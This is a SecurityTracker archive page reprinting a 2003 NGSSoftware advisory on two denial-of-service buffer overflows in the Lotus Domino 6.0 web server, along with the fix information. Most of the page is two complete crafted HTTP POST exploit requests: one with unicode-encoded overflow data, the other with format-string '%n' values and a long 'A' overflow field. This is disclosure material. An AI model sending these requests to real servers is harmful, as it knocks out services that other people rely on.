Sign Up for Your FREE Weekly SecurityTracker E-mail Alert Summary
|
|
|
|
|
|
|
Put SecurityTracker Vulnerability Alerts on Your Web Site -- It's Free!
|
|
|
|
Become a Partner and License Our Database or Notification Service
|
|
|
|
|
|
|
|
|
|
|
|
|
|
Lotus Domino Web Server Can Be Crashed With Incomplete or Invalid POST Request
|
|
SecurityTracker Alert ID: 1007541
|
|
CVE Reference: CAN-2003-0180
, CAN-2003-0181
(Links to External Site)
|
Updated: Dec 1 2003
|
Original Entry Date: Aug 20 2003
|
Impact: Denial of service via network
|
Fix Available: Yes
Exploit Included: Yes
Vendor Confirmed: Yes
|
Advisory: NGSSoftware
|
Version(s): 5.x, 6.0
|
Description: A denial of service vulnerability was reported in the Lotus Domino web server (nhttp.exe). A remote user can cause the web server to crash.
NGSSoftware Insight Security reported [on February 17, 2003] that a buffer overflow in the Lotus Domino web server allows a remote
user to crash the web service. The web service must be restarted to return to normal operations.
A remote user can reportedly
send an incomplete POST request using the s_Validation form to trigger the flaw. A remote user can also send a POST request using
the h_PageUI form with a non-existent parameter to trigger the flaw, according to the report.
Some demonstration exploit URLs
are provided in the Source Message.
|
Impact: A remote user can cause the Domino web services to crash.
|
Solution: The vendor has released a fixed version (6.0.1), available as described in Lotus document #1104528 (2003-02-21) at:
http://www-1.ibm.com/support/docview.wss?uid=swg21104528
|
Vendor URL: www.nextgenss.com/advisories/lotus-60dos.txt (Links to External Site)
|
Cause: Boundary error
|
Underlying OS: Linux (Any), UNIX (AIX), UNIX (HP/UX), UNIX (Solaris - SunOS), Windows (NT), Windows (2000)
|
|
Message History:
None.
|
Source Message Contents
|
Date: Wed, 20 Aug 2003 12:11:22 -0400
Subject: http://www.nextgenss.com/advisories/lotus-60dos.txt
|
NGSSoftware Insight Security Research Advisory
Name: LOTUS DOMINO Denial Of Service Attacks 1 & 2
Systems Affected: Release 6.0
Severity: Critical Risk
Category: Remote System Buffer Overrun
Vendor URL: http://www.lotus.com
Author: Mark Litchfield (mark@ngssoftware.com)
Date: 17th February 2003
Advisory number: #NISR17022003d
Description
***********
Lotus Domino and Notes together provide a featured enterprise collaboration system
with Domino providing application server services. Based on Netcrafts (www.netcraft.com)
Januray 2003 Server Survey, Lotus Domino is positioned 10th in the web server market
totaling 78,031.
Details
*******
There exists two areas in which a denial of service attack can be launched against the web
services of Lotus Domino (nhttp.exe). In both instances, the web services would be required
to be restarted by the domino administrator.
Attack 1 - Incomplete POST Request
POST
/test2.nsf/($Journal)/$new/?EditDocument&Form=h_PageUI&PresetFields=s_NotesForm;JournalEntry
HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/vnd.ms-excel,
application/vnd.ms-powerpoint, application/msword, */*
Referer:
http://ngssoftware/test2.nsf/($Journal)/$new/?EditDocument&Form=h_PageUI&PresetFields=h_EditA
ction;
h_New,s_NotesForm;JournalEntry
Accept-Language: en-gb
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
Host: ngssoftware
Content-Length: 8111
Connection: Keep-Alive
Cache-Control: no-cache
Cookie:
Shimmer=ui:I&DNIDate:20021212&CalIDate:20021212&AMActive:1&NMTLP:20021217T032503Z&
NMCount:0&CalView:D;
iwaSSL=0
Bi%5D%3DSj%28this%5Bi%5D%2Cstr%29%3B+return+this%3B%7D%26%26%26putAway%5B%27Ib%27%5D%5B%27BPE%27%5D%2
6%26%26
function+%28name%29%7Bfor%28var+i%3D0%3Bi%3Cthis.length%3Bi%2B%2B%29+if%28this%5Bi%5D+%3D%3D+name%29+
return+
true%3B+return+false%3B%7D%26%26%26putAway%5B%27Ib%27%5D%5B%27BSU%27%5D%26%26%26function+%28obj%29%7B
this%5B
this.length%5D%3Dobj%3B%7D%26%26%26putAway%5B%27Ib%27%5D%5B%27BQV%27%5D%26%26%26function+%28fnEquals%
29%7Bif
+%28%21fnEquals%29+fnEquals%3Dfunction%28s%2C+t%29%7Breturn+s%3D%3Dt%3B%7D%3B+for%28var+i%3D0%3B+i%3C
this.
length%3B+i%2B%2B%29+if%28typeof+this%5Bi%5D+%3D%3D+%27string%27%29+this%5Bi%5D%3DSj%28this%5Bi%5D%29
%3B+var
+i%3D0%3B+while%28i%3Cthis.length%29%7Bvar+s%3Dthis%5Bi%5D%3B+var+Ks%3Dfalse%3B+if%28s+%3D%3D+null+%7
C%7C+s+
%3D%3D+%22%22%29+Ks%3Dtrue%3B+for%28var+j%3Di%2B1%3Bj%3Cthis.length%3Bj%2B%2B%29%7Bif%28fnEquals%28s%
2C+this
%5Bj%5D%29%29+Ks%3Dtrue%3B%7Dif%28Ks%29%7Bthis.BNT%28i%29%3B+continue%3B%7Di%2B%2B%3B%7Dreturn+this%3
B%7D%26
%26%26putAway%5B%27Ib%27%5D%5B%27addUnique%27%5D%26%26%26function%28vAdd%2C+fnCompare%29%7Bif%28this.
indexOf
%28vAdd%2C+fnCompare%29+%3D%3D+-1%29+this%5Bthis.length%5D%3DvAdd%3B+return+this%3B%7D%26%26%26putAwa
y%5B%27
Ib%27%5D%5B%27indexOf%27%5D%26%26%26function%28vSearch%2C+fnCompare%29%7Bfor%28var+i%3D0%3B+i+%3C+thi
s.length
%3B+i%2B%2B%29%7Bif%28fnCompare%29%7Bif%28fnCompare%28this%5Bi%5D%2C+vSearch%29%29+return+i%3B%7Delse
%7Bif%28
this%5Bi%5D+%3D%3D+vSearch%29+return+i%3B%7D%7Dreturn+-1%3B%7D%26%26%26putAway%5B%27Ib%27%5D%5B%27Ub%
27%5D%26
%26%26function%28start%2C+len%29%7Bfor+%28var+i%3Dstart%3B+i+%3C+start+%2B+len%3B+%2B%2Bi%29%7Bthis%5
Bi%5D
%3Dthis%5Bi%2B1%5D%3B%7Dthis.length+-%3D+len%3B%7D%26%26%26putAway%5B%27folderStorage%27%5D%5B%27BNT%
27%5D%26
%26%26function+%28index%29%7Bvar+len%3Dthis.length%3B+if%28index+%3C+0+%7C%7C+%21%28index+%3C+len%29%
29+return
%3B+for%28var+i%3Dindex%3Bi%3Clen-1%3Bi%2B%2B%29+this%5Bi%5D%3Dthis%5Bi%2B1%5D%3B+this.length+--%3B%7
D%26%26
%26putAway%5B%27folderStorage%27%5D%5B%27BOY%27%5D%26%26%26function+%28aRemove%2CbDelAll%29%7Bfor%28v
ar+k%3D
0%3Bk%3CaRemove.length%3Bk%2B%2B%29%7Bvar+name%3DaRemove%5Bk%5D%3B+for%28var+i%3Dthis.length-1%3Bi%3E
%3D0%3B
i--%29+if%28this%5Bi%5D+%3D%3D+name%29%7Bfor%28var+j%3Di%3Bj%3C%3Dthis.length-2%3Bj%2B%2B%29+this%5Bj
%5D%3D
this%5Bj%2B1%5D%3B+this.length+--%3B+if%28%21bDelAll%29+break%3B%7D%7Dreturn+this%3B%7D%26%26%26putAw
ay%5B%27
folderStorage%27%5D%5B%27dz%27%5D%26%26%26function+%28str%29%7Bfor%28var+i%3D0%3Bi%3Cthis.length%3Bi%
2B%2B%29
+this%5Bi%5D%3DSj%28this%5Bi%5D%2Cstr%29%3B+return+this%3B%7D%26%26%26putAway%5B%27folderStorage%27%5
D%5B%27
BPE%27%5D%26%26%26function+%28name%29%7Bfor%28var+i%3D0%3Bi%3Cthis.length%3Bi%2B%2B%29+if%28this%5Bi%
5D+%3e
%3D+name%29+return+true%3B+return+false%3B%7D%26%26%26putAway%5B%27folderStorage%27%5D%5B%27BSU%27%5D
%26%26
%26function+%28obj%29%7Bthis%5Bthis.length%5D%3Dobj%3B%7D%26%26%26putAway%5B%27folderStorage%27%5D%5B
%27BQV%27
%5D%26%26%26function+%28fnEquals%29%7Bif+%28%21fnEquals%29+fnEquals%3Dfunction%28s%2C+t%29%7Breturn+s
%3D%3D
t%3B%7D%3B+for%28var+i%3D0%3B+i%3Cthis.length%3B+i%2B%2B%29+if%28typeof+this%5Bi%5D+%3D%3D+%27string%
27%29+
this%5Bi%5D%3DSj%28this%5Bi%5D%29%3B+var+i%3D0%3B+while%28i%3Cthis.length%29%7Bvar+s%3Dthis%5Bi%5D%3B
+var+Ks
%3Dfalse%3B+if%28s+%3D%3D+null+%7C%7C+s+%3D%3D+%22%22%29+Ks%3Dtrue%3B+for%28var+j%3Di%2B1%3Bj%3Cthis.
length%3B
j%2B%2B%29%7Bif%28fnEquals%28s%2C+this%5Bj%5D%29%29+Ks%3Dtrue%3B%7Dif%28Ks%29%7Bthis.BNT%28i%29%3B+co
ntinue
%3B%7Di%2B%2B%3B%7Dreturn+this%3B%7D%26%26%26putAway%5B%27folderStorage%27%5D%5B%27addUnique%27%5D%26
%26%26
function%28vAdd%2C+fnCompare%29%7Bif%28this.indexOf%28vAdd%2C+fnCompare%29+%3D%3D+-1%29+this%5Bthis.l
ength%5D
%3DvAdd%3B+return+this%3B%7D%26%26%26putAway%5B%27folderStorage%27%5D%5B%27indexOf%27%5D%26%26%26func
tion%28
vSearch%2C+fnCompare%29%7Bfor%28var+i%3D0%3B+i+%3C+this.length%3B+i%2B%2B%29%7Bif%28fnCompare%29%7Bif
%28fn
Compare%28this%5Bi%5D%2C+vSearch%29%29+return+i%3B%7Delse%7Bif%28this%5Bi%5D+%3D%3D+vSearch%29+return
+i%3B%7D
%7Dreturn+-1%3B%7D%26%26%26putAway%5B%27folderStorage%27%5D%5B%27Ub%27%5D%26%26%26function%28start2C+
len%29%7B
for+%28var+i%3Dstart%3B+i+%3C+start+%2B+len%3B+%2B%2Bi%29%7Bthis%5Bi%5D%3Dthis%5Bi%2B1%5D%3B%7Dthis.l
ength+-
%3D+len%3B%7D%26%26%26putAway%5B%27folderPageUnid%27%5D%5B%27BNT%27%5D%26%26%26function+%28index%29%7
Bvar+len
%3Dthis.length%3B+if%28index+%3C+0+%7C%7C+%21%28index+%3C+len%29%29+return%3B+for%28var+i%3Dindex%3Bi
%3Clen-1
%3Bi%2B%2B%29+this%5Bi%5D%3Dthis%5Bi%2B1%5D%3B+this.length+--%3B%7D%26%26%26putAway%5B%27folderPageUn
id%27%5D
%5B%27BOY%27%5D%26%26%26function+%28aRemove%2CbDelAll%29%7Bfor%28var+k%3D0%3Bk%3CaRemove.length%3Bk%2
B%2B%29
%7Bvar+name%3DaRemove%5Bk%5D%3B+for%28var+i%3Dthis.length-1%3Bi%3E%3D0%3Bi--%29+if%28this%5Bi%5D+%3D%
3D+name%29
%7Bfor%28var+j%3Di%3Bj%3C%3Dthis.length-2%3Bj%2B%2B%29+this%5Bj%5D%3Dthis%5Bj%2B1%5D%3B+this.length+-
-%3B+if
%28%21bDelAll%29+break%3B%7D%7Dreturn+this%3B%7D%26%26%26putAway%5B%27folderPageUnid%27%5D%5B%27dz%27
%5D%26%26
%26function+%28str%29%7Bfor%28var+i%3D0%3Bi%3Cthis.length%3Bi%2B%2B%29+this%5Bi%5D%3DSj%28this%5Bi%5D
%2Cstr
%29%3B+return+this%3B%7D%26%26%26putAway%5B%27folderPageUnid%27%5D%5B%27BPE%27%5D%26%26%26function+%2
8name%29
%7Bfor%28var+i%3D0%3Bi%3Cthis.length%3Bi%2B%2B%29+if%28this%5Bi%5D+%3D%3D+name%29+return+true%3B+retu
rn+false
%3B%7D%26%26%26putAway%5B%27folderPageUnid%27%5D%5B%27BSU%27%5D%26%26%26function+%28obj%29%7Bthis%5Bt
his.length
%5D%3Dobj%3B%7D%26%26%26putAway%5B%27folderPageUnid%27%5D%5B%27BQV%27%5D%26%26%26function+%28fnEquals
%29%7Bif
+%28%21fnEquals%29+fnEquals%3Dfunction%28s%2C+t%29%7Breturn+s%3D%3Dt%3B%7D%3B+for%28var+i%3D0%3B+i%3C
this.length
%3B+i%2B%2B%29+if%28typeof+this%5Bi%5D+%3D%3D+%27string%27%29+this%5Bi%5D%3DSj%28this%5Bi%5D%29%3B+va
r+i%3D0
%3B+while%28i%3Cthis.length%29%7Bvar+s%3Dthis%5Bi%5D%3B+var+Ks%3Dfalse%3B+if%28s+%3D%3D+null+%7C%7C+s
+%3D%3D+
%22%22%29+Ks%3Dtrue%3B+for%28var+j%3Di%2B1%3Bj%3Cthis.length%3Bj%2B%2B%29%7Bif%28fnEquals%28s%2C+this
%5Bj%5D%29
%29+Ks%3Dtrue%3B%7Dif%28Ks%29%7Bthis.BNT%28i%29%3B+continue%3B%7Di%2B%2B%3B%7Dreturn+this%3B%7D%26%26
%26putA
way%5B%27folderPageUnid%27%5D%5B%27addUnique%27%5D%26%26%26function%28vAdd%2C+fnCompare%29%7Bif%28thi
s.indexO
f%28vAdd%2C+fnCompare%29+%3D%3D+-1%29+this%5Bthis.length%5D%3DvAdd%3B+return+this%3B%7D%26%26%26putAw
ay%5B%27
folderPageUnid%27%5D%5B%27indexOf%27%5D%26%26%26function%28vSearch%2C+fnCompare%29%7Bfor%28var+i%3D0%
3B+i+%3C
+this.length%3B+i%2B%2B%29%7Bif%28fnCompare%29%7Bif%28fnCompare%28this%5Bi%5D%2C+vSearch%29%29+return
+i%3B%7D
else%7Bif%28this%5Bi%5D+%3D%3D+vSearch%29+return+i%3B%7D%7Dreturn+-1%3B%7D%26%26%26putAway%5B%27folde
rPageUni
d%27%5D%5B%27Ub%27%5D%26%26%26function%28start%2C+len%29%7Bfor+%28var+i%3Dstart%3B+i+%3C+start+%2B+le
n%3B+%2B
%2Bi%29%7Bthis%5Bi%5D%3Dthis%5Bi%2B1%5D%3B%7Dthis.length+-%3D+len%3B%7D%26%26%26putAway%5B%27selected
FolderIn
dex%27%5D%26%26%260%26%26%26putAway%5B%27BSi%27%5D%26%26%26%26%26%26&h_EditAction=h_Next&h_Se
tEditCurrentScen
e=s_StdPageEdit&h_SetPublishReaders=&h_AlternateName=&h_CurrentFolderDocument=&h_Curr
entFolderName=&h_SetEdit
NextScene=h_StdPageEditImage&h_SetReturnURL=&h_ReturnToPage=&h_NoSceneTrail=0&h_SetCo
mmand=h_ShimmerSave&h_Se
tSaveDoc=1&s_MailSendReturnPage=&s_MailViewBefore=&h_SetPublishToFolder=&h_Name=fooba
r&h_SetPublishAction=&h_
EditSceneTrail=&h_WorkflowStage=&h_IsConflict=&h_DictionaryId=&From=Anonymous&Pri
ncipal=Anonymous%25n%25n%25n
%25n%25n&Form=JournalEntry&Subject=foobar&Categories=testcat&h_RichTextItem=Body&
Body=%3Cdiv%3Eghhgh%3CSPAN%3E
%3C%2FSPAN%3E%3C%2Fdiv%3E&h_CurrentPosition=40%2501%25u0103%2514%2501%2501%2501%2501%2501%2503%25
01%2503%250
1%2501%2501%2501%2501%250C%2501%2506ihiih%25uE7F9%25u019F%25uE7F5%25u019F%25u9021%25u637F%25uAE47%25u
6359%25u
AE5C%25u6359%25u9021%25u637F%2511%2501%2503%2501&h_ImageURL=&h_HeadlineText=&h_ImageCount
=0&h_NewImageCount=0
&h_HeadlineCount=0&h_LinkURL=&h_LinkTitle=&h_PageText=&s_ImageUseCidRef=&s_Em
beddedImageInfo=&s_CidImageInfo=
&s_ConvertImage=0&FontNames=3&FontSize=2&HaikuEditorPlainTextArea=&s_UsePlainText
=0&s_PlainEditor=0&h_Attachm
entTimes=&h_AttachmentNamesAlt=&h_AttachmentLengthsAlt=&h_AttachmentOldNames=
Attack 2
Fictionary Value Field POST request
POST
/test2.nsf/iNotes/Proxy/?EditDocument&Form=s_Validation&PresetFields=s_ValId;MailPreferenceEd
it
HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*
Referer:
http://192.168.0.1/test2.nsf/iNotes/$new/?EditDocument&Form=h_PageUI&PresetFields=h_EditActio
n;h_New,
s_NotesForm;ShimmerMailPref
Accept-Language: en-gb
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; (R1 1.3); .NET CLR 1.0.3705)
Host: 192.168.0.1
Content-Length: 2548
Connection: Keep-Alive
Cache-Control: no-cache
Cookie:
Shimmer=DNIDate:20030114&CalIDate:20030114&NMTLP:20030114T191749Z&NMCount:0&SI_TLM:20
030115T020722%2C4
0Z&MOFolder:%28%24Drafts%29&MOFolderLabel:Drafts&MOTLM:20030115T000509%2C10Z&ui:I; iw
aSSL=0
%25%25PostCharset=ISO-8859-1&&EXCLUDEFROMVIEW=null&s_BrowserSuffix=mybrowser&h_Curren
tSkinName=me&h_CurrentSki
nType=myskin&s_UNH=%n%n%n%n%n%n%n&s_UNH=abcdefg&s_UNH=qwerty&VAL_ExpandGroup=0&VA
L_Type=1&VAL_Exhaustive=1&VAL
_DoConflictCheck=1&VAL_UNID=BBBBBBBBBBBBBBBBBBBBBBBBBBBBBB&VAL_Invitees=CCCCCCCCCCCCCCCCCCCCC
CCCCCCCCC&VAL_Dat
eTimeList=DDDDDDDDDDDDDDDDDDDDDDDDDDD&Data=liberty&AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAA
AAAAAAAAAA=washere
Fix Information
***************
IBM Lotus Notes and Domino Release 6.0.1 is currently available being marketed as the
first maintenance release.
It goes on to say if customers haven't already upgraded or migrated to Notes and Domino 6,
now is the time to
move and start reaping the benefits of this existing and highly praised release. Release
6.0.1 includes fixes
to enhance the quality and reliability of the Notes and Domino 6 products. It does not
however mention any
security issues, and NGS would strongly advise to upgrade as soon as possible not to reap
the benefits but to
secure yourself and your data against possible web based or network attacks.
The upgrade / patch can be obtained from
http://www14.software.ibm.com/webapp/download/search.jsp?q=&cat=&pf=&k
=&dt=&go=y&rs=ESD-NOTECLNTi&S_TACT=&S_CMP=&sb=r
A check for these issues has been added to DominoScan R2, a comprehensive automated
intelligent assessment tool
for Lotus Domino Servers of which more information is available from the
NGSSoftware website, http://www.ngssoftware.com/software/dominoscan.html
Further Information
*******************
For further information about the scope and effects of buffer overflows, please see
http://www.ngssoftware.com/papers/non-stack-bo-windows.pdf
http://www.ngssoftware.com/papers/ntbufferoverflow.html
http://www.ngssoftware.com/papers/bufferoverflowpaper.rtf
http://www.ngssoftware.com/papers/unicodebo.pdf
|
|
Go to the Top of This SecurityTracker Archive Page
|
